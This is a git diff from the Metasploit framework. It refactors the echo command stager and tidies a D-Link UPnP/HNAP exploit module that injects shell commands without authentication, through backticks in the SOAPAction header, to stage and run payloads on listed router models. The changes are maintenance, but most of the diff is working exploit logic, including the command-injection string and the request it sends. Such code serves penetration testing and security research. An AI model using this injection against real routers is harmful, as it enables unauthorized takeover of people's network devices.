diff --git a/lib/rex/exploitation/cmdstager/echo.rb b/lib/rex/exploitation/cmdstager/echo.rb index 253eb48214..462aade850 100644 --- a/lib/rex/exploitation/cmdstager/echo.rb +++ b/lib/rex/exploitation/cmdstager/echo.rb @@ -26,11 +26,10 @@ class CmdStagerEcho < CmdStagerBase # and initialize opts[:enc_format]. # def generate(opts = {}) - if opts[:temp] == false - opts[:temp] = '' - else - opts[:temp] = opts[:temp] || '/tmp/' - opts[:temp].gsub!(/\\/, "/") + opts[:temp] = opts[:temp] || '/tmp/' + + unless opts[:temp].empty? + opts[:temp].gsub!(/\\/, '/') opts[:temp] = opts[:temp].shellescape opts[:temp] << '/' if opts[:temp][-1,1] != '/' end diff --git a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb index b6bdb4e24d..9ac06e2df9 100644 --- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb @@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. - The following devices are also reported as affected: - DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB - DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR + The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, + DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, + DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ @@ -36,21 +36,19 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, - 'Platform' => 'unix', + 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { - 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { - 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE } - ], + ] ], 'DefaultTarget' => 0 )) @@ -60,16 +58,17 @@ class Metasploit3 < Msf::Exploit::Remote def check uri = '/HNAP1/' - soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings" + soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { - 'SOAPAction' => soapaction, - }, + 'SOAPAction' => soap_action, + } }) + if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end @@ -92,26 +91,25 @@ class Metasploit3 < Msf::Exploit::Remote execute_cmdstager( :flavor => :echo, :linemax => 200, - :temp => false + :temp => '' ) - end def execute_command(cmd, opts) uri = '/HNAP1/' - cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd - soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" + cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd + soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { - 'SOAPAction' => soapaction, - }, - },1) + 'SOAPAction' => soap_action, + } + }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end